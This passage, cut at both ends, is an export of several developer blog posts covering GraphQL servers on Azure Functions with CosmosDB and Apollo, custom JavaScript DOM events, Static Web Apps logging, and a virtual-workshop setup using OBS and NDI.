Startup:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 using Microsoft.Azure.Functions.Extensions.DependencyInjection; using Microsoft.Extensions.DependencyInjection; [assembly: FunctionsStartup(typeof(DotNet.GraphQL.CosmosDB.Startup))] namespace DotNet.GraphQL.CosmosDB { public class Startup : FunctionsStartup { public override void Configure(IFunctionsHostBuilder builder) { } } } There’s two things that are important to note about this code, first is that we have the [assembly: FunctionsStartup(... assembly level attribute which points to the Startup class. This tells the Function runtime that we have a class which will do some stuff when the application starts. Then we have the Startup class which inherits from FunctionsStartup. This base class comes from the Microsoft.Azure.Functions.Extensions NuGet package and works similar to the startup class in an ASP.NET Core application by giving us a method which we can work with the startup pipeline and add items to the dependency injection framework.\nWe’ll come back to this though, as we need to create our GraphQL schema first.\nCreating the GraphQL Schema Like our previous demos, we’ll use the trivia app.\nWe’ll start with the model which exists in our CosmosDB store (I’ve populated a CosmosDB instance with a dump from OpenTriviaDB, you’ll find the JSON dump here). Create a new folder called Models and then a file called QuestionModel.cs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 using System.Collections.Generic; using Newtonsoft.Json; namespace DotNet.GraphQL.CosmosDB.Models { public class QuestionModel { public string Id { get; set; } public string Question { get; set; } [JsonProperty("correct_answer")] public string CorrectAnswer { get; set; } [JsonProperty("incorrect_answers")] public List<string> IncorrectAnswers { get; set; } public string Type { get; set; } public string Difficulty { get; set; } public string Category { get; set; } } } As far as our application is aware, this is a generic data class with no GraphQL or Cosmos specific things in it (it has some attributes for helping with serialization/deserialization), now we need to create our GraphQL schema to expose it. We’ll make a new folder called Types and a file called Query.cs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 using DotNet.GraphQL.CosmosDB.Models; using HotChocolate.Resolvers; using Microsoft.Azure.Documents.Client; using Microsoft.Azure.Documents.Linq; using System; using System.Collections.Generic; using System.Linq; using System.Threading.Tasks; namespace DotNet.GraphQL.CosmosDB.Types { public class Query { public async Task<IEnumerable<QuestionModel>> GetQuestions(IResolverContext context) { // TODO } public async Task<QuestionModel> GetQuestion(IResolverContext context, string id) { // TODO } } } This class is again a plain C# class and Hot Chocolate will use it to get the types exposed in our query schema. We’ve created two methods on the class, one to get all questions and one to get a specific question, and it would be the equivalent GraphQL schema of:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 type QuestionModel { id: String question: String correctAnswer: String incorrectAnswers: [String] type: String difficulty: String category: String } schema { query: { questions: [QuestionModel] question(id: String): QuestionModel } } You’ll also notice that each method takes an IResolverContext, but that’s not appearing in the schema, well that’s because it’s a special Hot Chocolate type that will give us access to the GraphQL context within the resolver function.\nBut, the schema has a lot of nullable properties in it and we don’t want that, so to tackle this we’ll create an ObjectType for the models we’re mapping. Create a class called QueryType:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 using HotChocolate.Types; namespace DotNet.GraphQL.CosmosDB.Types { public class QueryType : ObjectType<Query> { protected override void Configure(IObjectTypeDescriptor<Query> descriptor) { descriptor.Field(q => q.GetQuestions(default!)) .Description("Get all questions in the system") .Type<NonNullType<ListType<NonNullType<QuestionType>>>>(); descriptor.Field(q => q.GetQuestion(default!, default!)) .Description("Get a question") .Argument("id", d => d.Type<IdType>()) .Type<NonNullType<QuestionType>>(); } } } Here we’re using an IObjectTypeDescription to define some information around the fields on the Query, and the way we want the types exposed in the GraphQL schema, using the built in GraphQL type system. We’ll also do one for the QuestionModel in QuestionType:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 using DotNet.GraphQL.CosmosDB.Models; using HotChocolate.Types; namespace DotNet.GraphQL.CosmosDB.Types { public class QuestionType : ObjectType<QuestionModel> { protected override void Configure(IObjectTypeDescriptor<QuestionModel> descriptor) { descriptor.Field(q => q.Id) .Type<IdType>(); } } } Consuming the GraphQL Schema Before we implement our resolvers, let’s wire up the schema into our application, and to do that we’ll head back to Startup.cs, and register the query, along with Hot Chocolate:\n1 2 3 4 5 6 7 8 9 10 11 12 public override void Configure(IFunctionsHostBuilder builder) { builder.Services.AddSingleton<Query>(); builder.Services.AddGraphQL(sp => SchemaBuilder.New() .AddServices(sp) .AddQueryType<QueryType>() .Create() ); builder.Services.AddAzureFunctionsGraphQL(); } First off we’re registering the Query as a singleton so it can be resolved, and then we’re adding GraphQL from Hot Chocolate. With the schema registration, we’re using a callback that will actually create the schema using SchemaBuilder, registering the available services from the dependency injection container and finally adding our QueryType, so GraphQL understands the nuanced type system.\nLastly, we call an extension method provided by the proof of concept code we included early to register GraphQL support for Functions.\nImplementing Resolvers For the resolvers in the Query class, we’re going to need access to CosmosDB so that we can pull the data from there. We could go and create a CosmosDB connection and then register it in our dependency injection framework, but this won’t take advantage of the input bindings in Functions.\nWith Azure Functions we can setup an input binding to CosmosDB, specifically we can get a DocumentClient provided to us, which FUnctions will take care of connection client reuse and other performance concerns that we might get when we’re working in a serverless environment. And this is where the resolver context, provided by IResolverContext will come in handy, but first we’re going to modify the proof of concept a little, so we can add to the context.\nWe’ll start by modifying the IGraphQLFunctions interface and adding a new argument to ExecuteFunctionsQueryAsync:\n1 2 3 4 Task<IActionResult> ExecuteFunctionsQueryAsync( HttpContext httpContext, IDictionary<string, object> context, CancellationToken cancellationToken); This IDictionary<string, object> will allow us to provide any arbitrary additional context information to the resolvers. Now we need to update the implementation in GraphQLFunctions.cs:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 public async Task<IActionResult> ExecuteFunctionsQueryAsync( HttpContext httpContext, IDictionary<string, object> context, CancellationToken cancellationToken) { using var stream = httpContext.Request.Body; var requestQuery = await _requestParser .ReadJsonRequestAsync(stream, cancellationToken) .ConfigureAwait(false); var builder = QueryRequestBuilder.New(); if (requestQuery.Count > 0) { var firstQuery = requestQuery[0]; builder .SetQuery(firstQuery.Query) .SetOperation(firstQuery.OperationName) .SetQueryName(firstQuery.QueryName); foreach (var item in context) { builder.AddProperty(item.Key, item.Value); } if (firstQuery.Variables != null && firstQuery.Variables.Count > 0) { builder.SetVariableValues(firstQuery.Variables); } } var result = await Executor.ExecuteAsync(builder.Create()); await _jsonQueryResultSerializer.SerializeAsync((IReadOnlyQueryResult)result, httpContext.Response.Body); return new EmptyResult(); } There’s two things we’ve done here, first is adding that new argument so we match the signature of the interface, secondly is when the QueryRequestBuilder is being setup we’ll loop over the context dictionary and add each item as a property of the resolver context.\nAnd lastly, we need to update the Function itself to have an input binding to CosmosDB, and then provide that to the resolvers:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [FunctionName("graphql")] public async Task<IActionResult> Run( [HttpTrigger(AuthorizationLevel.Anonymous, "get", "post", Route = null)] HttpRequest req, ILogger log, [CosmosDB( databaseName: "trivia", collectionName: "questions", ConnectionStringSetting = "CosmosDBConnection")] DocumentClient client, CancellationToken cancellationToken) { return await _graphQLFunctions.ExecuteFunctionsQueryAsync( req.HttpContext, new Dictionary<string, object> { { "client", client }, { "log", log } }, cancellationToken); } With that sorted we can implement our resolvers. Let’s start with the GetQuestions one to grab all of the questions from CosmosDB:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 public async Task<IEnumerable<QuestionModel>> GetQuestions(IResolverContext context) { var client = (DocumentClient)context.ContextData["client"]; var collectionUri = UriFactory.CreateDocumentCollectionUri("trivia", "questions"); var query = client.CreateDocumentQuery<QuestionModel>(collectionUri) .AsDocumentQuery(); var quizzes = new List<QuestionModel>(); while (query.HasMoreResults) { foreach (var result in await query.ExecuteNextAsync<QuestionModel>()) { quizzes.Add(result); } } return quizzes; } Using the IResolverContext we can access the ContextData which is a dictionary containing the properties that we’ve injected, one being the DocumentClient. From here we create a query against CosmosDB using CreateDocumentQuery and then iterate over the result set, pushing it into a collection that is returned.\nTo get a single question we can implement the GetQuestion resolver:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 public async Task<QuestionModel> GetQuestion(IResolverContext context, string id) { var client = (DocumentClient)context.ContextData["client"]; var collectionUri = UriFactory.CreateDocumentCollectionUri("trivia", "questions"); var sql = new SqlQuerySpec("SELECT * FROM c WHERE c.id = @id"); sql.Parameters.Add(new SqlParameter("@id", id)); var query = client.CreateDocumentQuery<QuestionModel>(collectionUri, sql, new FeedOptions { EnableCrossPartitionQuery = true }) .AsDocumentQuery(); while (query.HasMoreResults) { foreach (var result in await query.ExecuteNextAsync<QuestionModel>()) { return result; } } throw new ArgumentException("ID does not match a question in the database"); } This time we are creating a SqlQuerySpec to do a parameterised query for the item that matches with the provided ID. One other difference is that I needed to enable CrossPartitionQueries in the FeedOptions, because the id field is not the partitionKey, so you may not need that, depending on your CosmosDB schema design. And eventually, once the query completes we look for the first item, and if none exists raise an exception that’ll bubble out as an error from GraphQL.\nConclusion With all this done, we now have a our GraphQL server running in Azure Functions and connected up to a CosmosDB backend, in which we have no need to do any connection management ourselves, that’s taken care of by the input binding.\nYou’ll find the full code of my sample on GitHub.\nWhile this has been a read-only example, you could expand this out to support GraphQL mutations and write data to CosmosDB with a few more resolvers.\nSomething else that would be worth for you to explore is how you can look at the fields being selected in the query, and only retrieve that data from CosmosDB, because here we’re pulling all fields, but if you create a query like:\n1 2 3 4 5 6 7 8 { questions { id question correctAnswer incorrectAnswers } } It might be optimal to not return fields like type or category from CosmosDB.\n", "id": "2020-09-04-graphql-on-azure-part-4-serverless-comsosdb" }, { "title": "Custom Events in JavaScript", "url": "https://www.aaron-powell.com/posts/2020-08-21-custom-events-in-javascript/", "date": "Fri, 21 Aug 2020 15:09:34 +1000", "tags": [ "javascript", "web" ], "description": "Let's have a look at how to create and use custom events in JavaScript", "content": "Messaging systems in JavaScript, here we go again.\nOk, so it’s something I’ve written about a few times before, generally in the context of creating a pub/sub library, but in this post we’re going to look at something a bit different, how to use the event system in the DOM.\nWhile working with the DOM you’ll undoubtedly used the events that are provided, things like onclick, onchange, onkeypress, etc. as these are events that the DOM will raise when it is interacted with. The invocation of these events is beyond your control, other than the fact that your interaction is probably what caused them, but we can add listeners for them and do things when the occur.\nCurrently on my Twitch channel, I’m streaming the build of a web application that will show a selected list of timezones to allow you to compare across them. For this application I’m going framework free, meaning no React, no TypeScript, no CSS frameworks or anything like that, and doing so has meant that I’m looking at how to effectively handle things that happen within the application.\nSome of the components that are in the application do things that other parts of the application might want to respond to, so for this I started to look at how we can use custom events in the browser, rather than writing a pub/sub library… again.\nAnatomy of a DOM Event To understand a custom event, let’s quickly look at the DOM events. DOM events all share a parent type, Event, but are classed for the event that represent, like MouseEvent, KeyboardEvent or UIEvent, to name a few. The Event base class has useful information such as the target of the event, whether it can bubble to parent elements or whether it can be cancelled, with the subclasses then having specific data for that event type, like the key pressed or the mouse position.\nEvents all bubble by default, which means that the element that the event came from isn’t the only place you can listen to it, you can listen all the way up to window. You can see this in action by opening your browser DevTools (generally F12) and then running this in the JavaScript console:\n1 window.addEventListener("click", e => console.log(e)); Now start clicking around the page, notice that you get log messages appearing, and if you inspect them you’ll notice that the srcElement property is the element that you clicked on. If you change the above code from window to document and run it, you’ll now have two messages logged out, both are the same and have the same event object.\nThis is because th event has bubbled up from the element you originally clicked on to all of its parents until it ran out of parents. This is a useful trick if you want to have a single handler that can handle the same event from multiple places in the same way.\nCustom Events But what if we want to create our own event? In my Twitch stream I need to update the time every second, but there could be multiple timezones in display, so how would I go about doing that? Well, I could use a setInterval that then uses document.querySelectorAll to find the elements based on the DOM structure I expect there to be, but the problem is that that becomes a little brittle, one component, the “time manager”, needs to know about the internal structure of another component, the “time display”.\nThis is where a custom event can be useful, so let’s look at it. First up, we’ll need to define a custom event and there’s two ways to do that, either using the CustomEvent constructor, or by creating our own class inheriting Event. Here’s how we can use the CustomEvent constructor:\n1 const timeUpdated = new CustomEvent("timeUpdated", { now: Date.now() }); CustomEvent takes two bits of information, first is the type of the event, and this is what you would then listen to elsewhere in your code and secondly it takes an object that contains the custom data you want to add to the event object that the listeners will receive.\nNow, if you’re to create your own class it’d look like this:\n1 2 3 4 5 6 class TimeUpdatedEvent extends Event { constructor(time) { super("timeUpdated"); this.time = time; } } The major difference here is that we provide the event type to the super call in the constructor, which calls the constructor for Event and that in turn sets the type, otherwise it’s very much the same. My personal preference is to create the subclass for Event as then I know that I’m being consistent each time that I use my custom event types.\nWith our custom event ready, we need to dispatch the event, and that is done with the dispatchEvent method which exists on anything that the browser considers and EventTarget (which is a fancy way of saying things that are part of the DOM).\n1 window.dispatchEvent(new TimeUpdatedEvent(Date.now())); The last thing we need to do is to add a listener to the event:\n1 2 3 window.addEventListener("timeUpdated", e => { console.log(`The time is ${e.time}`); }); There we have it, we can dispatch a custom event and then listen to it elsewhere in the code.\nBubbling Events Going back up to the demo where we looked at the way the click event worked, we saw that the event bubbled up through the parents of the originating element. We can do this ourselves as well, but we need to explicitly tell the custom event tha we want to have it bubble because by default it will only dispatch on the element that it was dispatched against, not any of its parents.\nTo do this, we need to set the bubble property to true:\n1 2 3 4 5 6 class TimeUpdatedEvent extends Event { constructor(time) { super("timeUpdated", { bubble: true }); this.time = time; } } When using a subclass we pass this as a 2nd argument to the super call, and if we use CustomEvent directly, add it as a property of the 2nd argument there. Now when your event is dispatched it’ll go through each of its parents until it hits the top of the structure and stop. This pattern is useful if you want a component to not expose its internal DOM structure in any way, but still allow outsiders to listen to events.\nCancelling Events Sometimes an event might be an indicator that something is about to happen. Take the onsubmit event from the <form> element which is called before form submits itself to the target, generally POSTing data to a server, but if you’re wanting to use JavaScript to submit the form data you don’t want the default browser action to continue and that is when we’d call preventDefault on the event. This tells the browser that the default action shouldn’t be done, and in the case of a form, the submit won’t go ahead.\nWhen it comes to a custom event, there’s plenty of reasons we might want to stop the default action, maybe it’s an indication that some data already exists in the data source so you don’t want to go ahead with adding a duplicate record.\nBy default though a custom event can’t be cancelled as the cancelable property is set to false. This can be changed by passing cancelable: true to the constructor. Now your event listeners can call preventDefault on the event and you can check the defaultPrevented property when the listeners are complete.\n1 2 3 4 5 6 7 8 const ce = new CustomEvent("longRunningOperation", { cancelable: true }); window.addEventListener("longRunningOperation", e => e.preventDefault()); window.dispatchEvent(ce); if (ce.defaultPrevented) { console.log("you didn't want that done"); } Events are Synchronous Something to be aware of, especially in the context of having cancelable events, is that the event listeners are executed in a synchronous manner, meaning that if your listener wants to cancel the event it’ll need to make that decision without waiting for any asynchronous operation to complete (like a Promise continuation).\nTo see what I mean, try this code out:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 const ce = new CustomEvent("longRunningOperation", { cancelable: true }); window.addEventListener("longRunningOperation", async e => { const p = new Promise(res => { setTimeout(() => { console.log("preventing default"); e.preventDefault(); console.log("default prevented"); res(); }, 1000); }); console.log("before promise"); await p; console.log("after promise"); }); window.dispatchEvent(ce); if (ce.defaultPrevented) { console.log("you didn't want that done"); } else { console.log("carry on"); } What you’ll see is output like so:\nbefore promise carry on preventing default default prevented after promise Unfortunately, we weren’t able to cancel our event before it checked if we cancelled it. So be aware of this and if you need to cancel the event as the result of an async operation, you’ll need to think through the design of your event system more closely.\nConclusion In this post we’ve taken a look at how we can leverage the DOM’s built in event system to create our own custom events to raise between parts of our application that would better describe the intent of an event, rather than the more generic events that come out of the DOM itself.\nIf you want to see this in action, pop by my Twitch stream, where I stream each Friday at midday (Sydney time).\n", "id": "2020-08-21-custom-events-in-javascript" }, { "title": "Getting Logs From Static Web Apps APIs", "url": "https://www.aaron-powell.com/posts/2020-08-12-getting-logs-from-static-web-apps-apis/", "date": "Wed, 12 Aug 2020 14:35:09 +1000", "tags": [ "serverless" ], "description": "A quick tip on how to make it easier to diagnose production problems with Static Web Apps", "content": "I’ve been doing a lot recently with Azure Static Web Apps, mainly because I find it to be a service that really fits me needs. Sometimes though, I write code that has a bug in it, especially in the Functions backend, and that can be difficult to diagnose.\nThe other day I found myself in such a situation, the API worked locally, but when deployed to Azure it didn’t. sigh And as the service is in preview the debugging story is still not great. sigh again\nNow, we know that the API for the Static Web Apps is Azure Functions and Functions integrates with App Insights, so I figured there has to be some way to tap into that.\nFirst up, we need to create an Application Insights resource in Azure:\nOnce the resource is created, copy the Instrumentation Key for it:\nNow we can head over to our Static Web App, then navigate to it’s Configuration and click Add:\nWe need to add a new configuration value named APPINSIGHTS_INSTRUMENTATIONKEY which has the value of your Instrumentation Key. Once this is saved the Functions are restarted and connected to App Insights. All that’s left is to start generating some errors and check out the exceptions query.\nA bonus tip is that if you want to look at anything you write out to the logs of Azure Functions (context.log in JavaScript), they are available in the traces table.\nConclusion It’s not immediately obvious how to connect up a Static Web Apps backend API to App Insights, but as it’s Functions under the hood it really only takes a APPINSIGHTS_INSTRUMENTATIONKEY being set. And since configuration values are per-environment, you can use a different App Insights for your non-production instance easily.\nAnd a shout-out to Anthony Chu who pointed me in this direction.\n", "id": "2020-08-12-getting-logs-from-static-web-apps-apis" }, { "title": "GraphQL on Azure: Part 3 - Serverless With JavaScript", "url": "https://www.aaron-powell.com/posts/2020-08-07-graphql-on-azure-part-3-serverless-with-javascript/", "date": "Fri, 07 Aug 2020 11:08:58 +1000", "tags": [ "azure", "serverless", "azure-functions", "javascript", "graphql" ], "description": "Let's look at how we can create a JavaScript GraphQL server and deploy it to an Azure Function", "content": "Last time we look at how to get started with GraphQL on dotnet and we looked at the Azure App Service platform to host our GraphQL server. Today we’re going to have a look at a different approach, using Azure Functions to create run GraphQL in a Serverless model. We’ll also look at using JavaScript (or specifically, TypeScript) for this codebase, but there’s no reason you couldn’t deploy a dotnet GraphQL server on Azure Functions or deploy JavaScript to App Service.\nGetting Started For the server, we’ll use the tooling provided by Apollo, specifically their server integration with Azure Functions, which will make it place nicely together.\nWe’ll create a new project using Azure Functions, and scaffold it using the Azure Functions Core Tools:\n1 2 func init graphql-functions --worker-runtime node --language typescript cd graphql-functions If you want JavaScript, not TypeScript, as the Functions language, change the --language flag to javascript.\nNext, to host the GraphQL server we’ll need a Http Trigger, which will create a HTTP endpoint in which we can access our server via:\n1 func new --template "Http Trigger" --name graphql The --name can be anything you want, but let’s make it clear that it’s providing GraphQL.\nNow, we need to add the Apollo server integration for Azure Functions, which we can do with npm:\n1 npm install --save apollo-server-azure-functions Note: if you are using TypeScript, you need to enable esModuleInterop in your tsconfig.json file.\nLastly, we need to configure the way the HTTP Trigger returns to work with the Apollo integration, so let’s open function.json within the graphql folder, and change the way the HTTP response is received from the Function. By default it’s using a property of the context called res, but we need to make it explicitly return be naming it $return:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 { "bindings": [ { "authLevel": "function", "type": "httpTrigger", "direction": "in", "name": "req", "methods": ["get", "post"] }, { "type": "http", "direction": "out", "name": "$return" } ], "scriptFile": "../dist/graphql/index.js" } Implementing a Server We’ve got out endpoint ready, it’s time to start implementing the server, which will start in the graphql/index.ts file. Let’s replace it with this chunk:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 import { ApolloServer, gql } from "apollo-server-azure-functions"; const typeDefs = gql` type Query { graphQLOnAzure: String! } `; const resolvers = { Query: { graphQLOnAzure() { return "GraphQL on Azure!"; } } }; const server = new ApolloServer({ typeDefs, resolvers }); export default server.createHandler(); Let’s talk about what we did here, first up we imported the ApolloServer which is the server that will handle the incoming requests on the HTTP Trigger, we use that as the very bottom by creating the instance and exporting the handler as the module export.\nNext, we imported gql, which is a template literal that we use to write our GraphQL schema in. The schema we’ve created here is pretty basic, it only has a single type, Query on it that has a single member to output.\nLastly, we’re creating an object called resolvers, which are the functions that handle the request when it comes in. You’ll notice that this object mimics the structure of the schema we provided to gql, by having a Query property which then has a function matching the name of the available queryable values.\nThis is the minimum that needs to be done and if you fire up func start you can now query the GraphQL endpoint, either via the playground of from another app.\nImplementing our Quiz Let’s go about creating a more complex solution, we’ll implement the same Quiz that we did in dotnet.\nWe’ll start by defining the schema that we’ll have on our server:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 const typeDefs = gql` type Quiz { id: String! question: String! correctAnswer: String! incorrectAnswers: [String!]! } type TriviaQuery { quizzes: [Quiz!]! quiz(id: String!): Quiz! } schema { query: TriviaQuery } `; Now we have two types defined, Quiz and TriviaQuery, then we’ve added a root node to the schema using the schema keyword and then stating that the query is of type TriviaQuery.\nWith that done, we need to implement the resolvers to handle when we request data.\n1 2 3 const resolvers = { TriviaQuery: {} }; This will compile and run, mostly because GraphQL doesn’t type check that the resolver functions are implemented, but you’ll get a bunch of errors, so instead we’ll need implement the quizzes and quiz resolver handlers.\nHandling a request Let’s implement the quizzes handler:\n1 2 3 4 5 6 7 const resolvers = { TriviaQuery: { quizzes: (parent, args, context, info) => { return null; } } }; The function will receive 4 arguments, you’ll find them detailed on Apollo’s docs, but for this handler we really only need one of them, context, and that will be how we’ll get access to our backend data source.\nFor the purposes of this blog, I’m skipping over the implementation of the data source, but you’ll find it on my github.\n1 2 3 4 5 6 7 8 const resolvers = { TriviaQuery: { quizzes: async (parent, args, context, info) => { const questions = await context.dataStore.getQuestions(); return questions; } } }; You might be wondering how the server knows about the data store and how it got on that context argument. This is another thing we can provide to Apollo server when we start it up:\n1 2 3 4 5 6 7 const server = new ApolloServer({ typeDefs, resolvers, context: { dataStore } }); Here, dataStore is something imported from another module.\nContext gives us dependency injection like features for our handlers, so they don’t need to establish data connections themselves.\nIf we were to open the GraphQL playground and then execute a query like so:\n1 2 3 4 5 6 7 8 query { quizzes { question id correctAnswer incorrectAnswers } } We’ll get an error back that Quiz.correctAnswer is a non-null field but we gave it null. The reason for this is that our storage type has a field called correct_answer, whereas our model expects it to be correctAnswer. To address this we’ll need to do some field mapping within our resolver so it knows how to resolve the field.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 const resolvers = { TriviaQuery: { quizzes: async (parent, args, context, info) => { const questions = await context.dataStore.getQuestions(); return questions; } }, Quiz: { correctAnswer: (parent, args, context, info) => { return parent.correct_answer; }, incorrectAnswers: (parent, args, context, info) => { return parent.incorrect_answers; } } }; This is a resolver chain, it’s where we tell the resolvers how to handle sub-fields of an object and it acts just like a resolver itself, so we have access to the same context and if we needed to do another DB lookup, we could.\nNote: These resolvers will only get called if the fields are requested from the client. This avoids loading data we don’t need.\nYou can go ahead and implement the quiz resolver handler yourself, as it’s now time to deploy to Azure.\nDisabling GraphQL Playground We probably don’t want the Playground shipping to production, so we’d need to disable that. That’s done by setting the playground property of the ApolloServer options to false. For that we can use an environment variable (and set it in the appropriate configs):\n1 2 3 4 5 6 7 8 const server = new ApolloServer({ typeDefs, resolvers, context: { dataStore }, playground: process.env.NODE_ENV === "development" }); For the sample on GitHub, I’ve left the playground enabled.\nDeploying to Azure Functions With all the code complete, let’s look at deploying it to Azure. For this, we’ll use a standard Azure Function running the latest Node.js runtime for Azure Functions (Node.js 12 at the time of writing). We don’t need to do anything special for the Functions, it’s already optimised to run a Node.js Function with a HTTP Trigger, which is all this really is. If we were using a different runtime, like .NET, we’d follow the standard setup for a .NET Function app.\nTo deploy, we’ll use GitHub Actions, and you’ll find docs on how to do that already written, and I’ve done a video on this as well. You’ll find the workflow file I’ve used in the GitHub repo.\nWith a workflow committed and pushed to GitHub and our App Service waiting, the Action will run and our application will be deployed. The demo I created is here.\nConclusion Throughout this post we’ve taken a look at how we can create a GraphQL server running inside a JavaScript Azure Functions using the Apollo GraphQL server, before finally deploying it to Azure.\nWhen it comes to the Azure side of things, there’s nothing different we have to to do run the GraphQL server in Azure Functions, it’s just treated as a HTTP Trigger function and Apollo has nice bindings to allow us to integrate the two platforms together.\nAgain, you’ll find the complete sample on my GitHub for you to play around with yourself.\n", "id": "2020-08-07-graphql-on-azure-part-3-serverless-with-javascript" }, { "title": "A Guide to Virtual Workshops", "url": "https://www.aaron-powell.com/posts/2020-07-30-a-guide-to-virtual-workshops/", "date": "Thu, 30 Jul 2020 04:55:27 +1000", "tags": [ "public-speaking", "conference" ], "description": "I recently ran my first virtual workshop and wanted to share how I did it and some thoughts I had on doing it", "content": "Since the COVID-19 pandemic started I’ve done a number of virtual events (I shared my thoughts on being successful with them last week) but earlier this week I did something new, I ran a two-day workshop as part of the NDC Melbourne virtual event programming.\nStarted day 1 of @slace's #React workshop at @NDC_Conferences Melbourne Online! pic.twitter.com/78XzRE4w3m\n— Melissa Houghton (@meliss_houghton) July 27, 2020 The workshop was the React for Beginners workshop that I’ve been running as part of NDC Sydney for the past few years (and originally created with Jake Ginnivan) but normally it’s done in person in person, so I wanted to do a write up on how I ran it virtually, what worked and where I feel there’s room for improvement.\nConsiderations for Online Workshops When I was getting prepared to deliver the workshop there were a few things that I started to consider on what would make the experience as seamless for attendees. Since I’m pretty familiar with how to deliver the workshop in person, I wanted to try and replicate as much of a normal experience as I could, even though I wasn’t able to walk about the room and talk to people.\nThe first thing to think about is how would I engage with the attendees. I mentioned in my online events post that you can run an event in one of two formats, conference call or broadcast. Since a workshop should be an interactive experience a conference call format is the optimal way to go, I can see the people (if they turn on their camera) and we can talk to each other. NDC uses WebEx as the platform for this (I did have an option for Zoom, but WebEx is their preferred), it does what you need it to do, but personally I would avoid WebEx as a platform as I found it clunky to use and the desktop app error prone (I ended up running it in the browser which was more stable).\nThe next consideration I had was how would we make it optimal for people to see the slides and code as I share it. Having been on both sides of virtual tech presentations I know what it’s like when the text is hard to read because I forgot to bump the font size, but then you also need to consider latency and visual artefact on the stream, will the text be legible? So, you need to think about what the best way for everyone will be to ensure they can watch what you’re presenting.\nFinally, since the workshop is hands on, attendees build something throughout, I needed to think through what options we’d have to replace the normal experience of an instructor coming and sitting next to them to pair on a problem.\nSetting Up a Studio I’ve been doing some video stuff recently (including streaming every Friday on my Twitch channel) so I’ve been learning about how to use OBS Studio. OBS (Open Broadcast Software) is an open source application for creating video streams and gives you the ability to take different inputs, combine them together, produce a single output feed. It can be a bit daunting to get started with but you’ll find plenty of videos on YouTube (here’s a good starting point) and once you get the basics down, it’s really fun to see how you get set everything up and make you look professional.\nCamera For the workshop, I was presenting from my home office which looks like this.\nThis room use to be our baby room, before our kids started to share, but it still contains some of the facilities of being a baby room, like the nappy change table, one of their wardrobes, and generally, piles of junk. This isn’t really what I wanted everyone to have to deal with in my background (and I don’t need it for calls that I’m on or when I’m streaming), but I don’t have the facilities to setup a green screen behind me, since there’s a door in the way.\nThankfully, there’s a solution to that, a virtual green screen. Early on in the pandemic one of my colleagues introduced me to XSplit VCam, which runs as an interception of your webcam feed and allows you to do things like background blur, virtual backgrounds or background removal. It’s not perfect, as it’s using image detection to work out where a person is in the image and do removal of everything else, but it’s good enough. Using XSplit with a virtual background I now look like this:\nYou can see the edges of me are fuzzing out, but overall, it’s a better picture than the junk background. If you can smooth out what’s behind you (I closed the wardrobe and draped a solid-colour towel over the hanging stuff) then it’ll become even better. It might not be as good as a proper green screen but it’s a lot simpler to use!\nPresenting When it comes to presenting online, you’ll share your screen (or share an app) and everyone sees that in full screen, but the cameras are pushed away to focus on the content. This starts removing the personalisation aspect of the session as you lose the connection to the presenter. Not ideal if we’re going to be spending two days together on a call.\nTo tackle this, I decided to change the presentation format up from a screen share to creating using a virtual camera.\nUsing OBS I created a scene which is made up of three components, my camera feed via XSplit with background removal, a background image for NDC Melbourne and my screen. I layered my camera on top of everything so I’m now sitting in front of the slides (or code) and can talk to the slides just over my shoulder.\nI then created another scene for when we were in code which increased the size of the shared screen and decreased the size of me.\nWith these two scenes I, as the presenter, was clearly visible the whole time making it easier to maintain a connection to the audience, even though I can’t see them.\nLastly, this video feed needs to be sent back out over the presentation platform (WebEx in this case), and to do that you’ll need a virtual camera plugin for OBS. Scott Hanselman has a great post on how to set this up and I went down the route of using NDI to expose the feed from OBS and then NDI’s virtual camera to send the feed over the call.\nDownsides to Virtual Cameras Mostly, this approach worked really well for us, but there is a downside to using a virtual camera rather than traditional screen sharing, and that is that conference call software is designed to have the person who’s speaking as the camera in focus. This can be a problem when your camera is also your presentation medium, since if someone else’s audio comes in (they ask a question or they aren’t on mute and make a noise) all of a sudden your camera is defocused and people can’t follow along.\nMy tip here is to have everyone on mute by default, so that you are considered the active speaker, or if your software allows it, get people to pin the camera view of you. You’d best doing a tech check or two to practice just how it’ll work and what your attendees will see so you can be prepared to help someone through a loss of video.\nLightening the Load Anyone who’s used OBS, whether it’s to stream coding or gaming, will know that it can be heavy on system resources, combine this with an app doing virtual a green screen, running a browser + editor + whatever tooling you need and finally, connecting to the call you’re presenting on, well you need to have a pretty powerful machine.\nAlas, I don’t have that. Sure, I’ve got a top-spec’ed Surface Book 2, but it isn’t quite powerful enough for all this stuff (as you’ll may have seen if you’ve joined any of my Twitch streams). So, I needed to think creatively here, or I would fall back to the obvious solution to just simplify my life and not try and run a production studio in conjunction to the call.\nEnter NDI.\nNDI, Network Device Interface, is a standard for sharing audio and video over a network connection. If you want to splash some cash you can buy devices that you connect as an external monitor that then makes it available as a network source to OBS, but I don’t have a $1000 to spend, so instead we’ll go with a software solution, OBS’s NDI plugin.\nUsing this plugin, you can expose OBS from one machine to be received by another machine on as an input to NDI’s virtual camera. This means that I no longer needed to connect to WebEx on my laptop, and instead have that running on a separate device, freeing up some CPU cycles for everything else. This also meant that I had a level of redundancy. If my laptop that’s running the slides/demo went offline, it didn’t kill the call, I could still chat with attendees while doing a recovery on my main device (thankfully it didn’t happen, but it was in the back of my mind), similarly if the call dropped I could re-connect and the screen would easily come back up at the exact correct place.\nThis did mean that my Surface Book 2 was outputting an NDI stream over my wifi network to my Surface Pro4 that was turning it into a webcam to push out via WebEx. Yeah, totally not an over-engineered setup at all! 😂\nImproving Accessibility One of the biggest hurdles with online events is accessibility. I’m 